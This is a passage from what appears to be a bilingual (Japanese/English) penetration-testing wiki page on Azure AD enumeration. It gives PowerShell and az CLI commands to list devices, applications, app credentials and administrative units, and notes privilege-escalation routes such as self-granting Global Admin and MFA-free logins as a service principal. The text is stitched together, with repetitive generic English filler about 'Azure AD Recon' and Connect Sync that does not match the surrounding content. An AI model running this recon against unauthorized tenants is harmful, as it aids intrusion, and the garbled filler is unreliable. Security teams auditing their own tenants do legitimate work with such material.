  2. Verify Synchronization: Confirm that the synchronization process is active and functioning properly.

  3. Enumerate Contacts: Examine the synchronized data to enumerate contacts in Azure AD.

Summary

User enumeration, group enumeration, and contact enumeration are crucial steps in the reconnaissance phase of a penetration test. By leveraging tools like Azure AD Recon and Azure AD Connect Sync, security professionals can gather valuable information about users, groups, and contacts within an Azure AD environment.

# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Registred users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Get dives managed using Intune
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }

デバイス(VM)がAzureADに参加している場合、AzureADのユーザーはログインできるようになります。 さらに、ログインしたユーザーがデバイスの所有者である場合、彼はローカル管理者になります。

アプリケーション

アプリはポータル内のアプリ登録(エンタープライズアプリケーションではありません)。 ただし、各アプリ登録は同じ名前のエンタープライズアプリケーションサービス プリンシパル)を作成します。 さらに、アプリがマルチテナント アプリである場合、別のテナントに同じ名前のエンタープライズ アプリサービス プリンシパル)が作成されます。

アプリが生成されると、2種類の権限が与えられます:

  • サービス プリンシパルに与えられる権限

  • ユーザーを代表してアプリが持ち、使用できる権限

# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad app list --query "[?keyCredentials != null].displayName"

Azure AD Enumeration

User Enumeration

To enumerate users in Azure AD, you can use tools like Azure AD Recon or Azure AD Connect Sync. These tools can help you gather information about users, groups, and contacts in the Azure AD environment.

Using Azure AD Recon

  1. Install Azure AD Recon: Download and install Azure AD Recon on your local machine.

  2. Run the Tool: Launch Azure AD Recon and provide the necessary inputs such as the Azure AD domain name and credentials.

  3. Enumerate Users: Use the tool to enumerate users in the Azure AD environment.

Using Azure AD Connect Sync

  1. Set up Azure AD Connect Sync: Configure Azure AD Connect Sync to synchronize on-premises directories with Azure AD.

  2. Run Sync: Initiate a sync operation to update user information in Azure AD.

  3. Check Azure AD Portal: Access the Azure AD portal to view the synchronized user information.

Group Enumeration

To enumerate groups in Azure AD, you can leverage tools like Azure AD Recon or Azure AD Connect Sync. These tools can assist in identifying and gathering information about groups in the Azure AD environment.

Using Azure AD Recon

  1. Launch Azure AD Recon: Open Azure AD Recon on your machine.

  2. Provide Inputs: Enter the required details such as the Azure AD domain name and authentication credentials.

  3. Enumerate Groups: Utilize the tool to enumerate groups present in Azure AD.

Using Azure AD Connect Sync

  1. Configure Sync Settings: Set up Azure AD Connect Sync to synchronize group information.

  2. Initiate Sync: Run a synchronization process to update group details in Azure AD.

  3. Review Groups: Check the Azure AD portal to see the synchronized group information.

Device Enumeration

For enumerating devices in Azure AD, tools like Azure AD Recon or Azure AD Connect Sync can be beneficial. These tools aid in discovering and retrieving information about devices registered in Azure AD.

Using Azure AD Recon

  1. Install the Tool: Download and install Azure AD Recon.

  2. Launch the Tool: Open Azure AD Recon and input the Azure AD domain details along with authentication credentials.

  3. Enumerate Devices: Utilize the tool to enumerate devices within Azure AD.

Using Azure AD Connect Sync

  1. Sync Configuration: Configure Azure AD Connect Sync to include device synchronization.

  2. Run Synchronization: Initiate a synchronization process to update device information in Azure AD.

  3. Check Device Details: Access the Azure AD portal to view the synchronized device information.

Summary

Azure AD enumeration is crucial for understanding the users, groups, and devices present in an Azure AD environment. By utilizing tools like Azure AD Recon and Azure AD Connect Sync, security professionals can gather valuable insights to assess the security posture of Azure AD.

# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id>  | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *

Azure AD Enumeration

Enumerate Azure AD Users

To list all users in Azure AD, you can use the following PowerShell command:

Get-AzureADUser

Enumerate Azure AD Groups

To list all groups in Azure AD, you can use the following PowerShell command:

Get-AzureADGroup

Enumerate Azure AD Applications

To list all applications in Azure AD, you can use the following PowerShell command:

Get-AzureADApplication

Enumerate Azure AD Service Principals

To list all service principals in Azure AD, you can use the following PowerShell command:

Get-AzureADServicePrincipal

Enumerate Azure AD Devices

To list all devices in Azure AD, you can use the following PowerShell command:

Get-AzureADDevice

Enumerate Azure AD Domains

To list all domains in Azure AD, you can use the following PowerShell command:

Get-AzureADDomain

Enumerate Azure AD Directory Roles

To list all directory roles in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRole

Enumerate Azure AD Directory Role Members

To list all members of a specific directory role in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRoleMember -ObjectId <DirectoryRoleObjectId>

Replace <DirectoryRoleObjectId> with the actual object ID of the directory role you want to enumerate members for.

# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential

AppRoleAssignment.ReadWrite の権限を持つアプリは、自身に役割を付与することで Global Admin に昇格 できます。 詳細についてはこちらをチェック

トークンをリクエストする際にアプリケーションが自身の正体を証明するために使用する秘密文字列は、アプリケーションパスワードです。 したがって、この パスワード を見つけると、テナント内のサービスプリンシパル としてアクセスできます。 このパスワードは生成時にのみ表示されることに注意してください(変更できますが、再度取得することはできません)。 アプリケーション所有者 は、それに パスワードを追加 できます(そのアプリケーションを偽装できます)。 これらのサービスプリンシパルとしてのログインは リスクがあるとはマークされず、MFA がありません。

アプリケーションと(エンタープライズアプリケーションまたはサービスプリンシパル)の違い

Azure におけるアプリケーションとサービスプリンシパルの違い:

  • アプリケーション/アプリケーション登録: Azure AD に存在するアプリケーションです

  • (Get-AzureADApplication -filter "DisplayName eq 'testapp'")

  • サービスプリンシパル/エンタープライズアプリケーション: Azure AD におけるセキュリティオブジェクトで、Azure ディレクトリでの 特権 を持つことができ、自身のアプリケーションまたはサードパーティアプリケーションにリンクされています

  • Get-AzureADServicePrincipal -filter "DisplayName eq 'testapp'")

  • 管理者は、非常に機密性の高い権限を与える場合、その権限を承認する必要があるかもしれません。

アプリケーションは サードパーティテナント を実行する可能性があり、それを使用し始めてアクセスを与えると、必要な情報にアクセスするために あなたのテナントにエンタープライズアプリケーション/サービスプリンシパルが作成されます

管理単位

ユーザーの管理をより効果的に行うために使用されます。

管理単位は、組織内の任意の部分に権限を制限します。たとえば、管理単位を使用して、Helpdesk Administrator 役割を地域サポートスペシャリストに委任して、彼らがサポートする地域のユーザーのみを管理できるようにすることができます。

したがって、管理単位に役割を割り当てることができ、そのメンバーはその役割を持つことができます。

AzureAD

Azure Active Directory (AzureAD) is Microsoft's cloud-based identity and access management service. It allows organizations to manage user identities and access permissions in the cloud.

Enumeration

When conducting a penetration test on AzureAD, enumeration is a crucial step. This involves gathering information about users, groups, roles, and permissions within the AzureAD environment.

Tools

There are various tools available for enumerating AzureAD, such as:

  • Azure AD PowerShell Module: Allows you to manage AzureAD resources using PowerShell cmdlets.

  • Azure AD Graph API: Enables programmatic access to AzureAD resources.

  • Microsoft Graph API: Provides a unified programmability model to access Microsoft cloud services.

Exploitation

After enumeration, the next step is to identify and exploit vulnerabilities in the AzureAD environment. This may include password spraying attacks, phishing campaigns, or exploiting misconfigurations in AzureAD settings.

Best Practices

To secure AzureAD, it is essential to follow best practices such as enforcing strong password policies, enabling multi-factor authentication, monitoring sign-in logs, and regularly reviewing permissions and roles.

By following these best practices, organizations can enhance the security of their AzureAD environment and protect against unauthorized access and data breaches.

# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members

Azure AD Identity Protection (AIP)

Azure AD Identity Protection (AIP)は、Azure Active Directory内のユーザーのアイデンティティを保護するために自動検出と是正を使用するセキュリティサービスです。AIPはユーザーサインインやアイデンティティ構成のリスクを継続的に監視し、適切なセキュリティ対策を自動的に適用して、多要素認証の要求や潜在的に危険な活動のブロックなどを行います。これにより、組織はアイデンティティに基づくセキュリティ侵害を防ぐことができます。

フロー:

  1. Azure AD Identity Protectionはユーザーの活動を監視し、ユーザーのサインイン、認証イベントなどのデータを収集します。

  2. サービスはこのデータを分析し、潜在的なセキュリティ脅威を検出するために機械学習アルゴリズムを使用します。

  3. Azure AD Identity Protectionは脅威(たとえば、サインイン)にリスクレベルを割り当てし、必要に応じてアラートを生成して自動的なアクションを実行します。

Azure AD Password Protection (APP)

Azure AD Password Protection (APP)は、Azure Active Directory内で強力なパスワードポリシーを強制することにより、弱いパスワードを防止するセキュリティ機能です。APPは一般的に使用される弱いパスワードおよびそのバリアントをブロックし、パスワード関連の侵害のリスクを低減します。これはクラウドレベルとオンプレミスのActive Directoryの両方で適用でき、組織全体でパスワードセキュリティを向上させます。

参考

前へAz - Device Registration次へAz - Conditional Access Policies / MFA Bypass

最終更新